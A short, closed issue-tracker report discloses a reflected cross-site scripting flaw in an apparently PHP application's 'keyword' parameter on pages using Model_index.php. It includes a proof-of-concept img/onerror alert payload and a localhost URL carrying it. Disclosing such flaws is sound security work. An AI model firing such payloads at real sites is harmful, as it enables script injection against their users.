Closed
Description
I found multiple reflected cross site scripting vulnerability where the page use Model_index.php ,we can see where is no XSS filter in "keyword" parameter.

now I input payload :aa">< img src=x onerror=alert(1)>
the full url is :http://127.0.0.1/Public/?g=Team&m=User&a=index&keyword=aa%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E
and there are lots of pages use Model_index.php,and they all have reflected cross site scripting vulnerability.Like:
..
..
..
Metadata
Metadata
Assignees
Labels
No labels
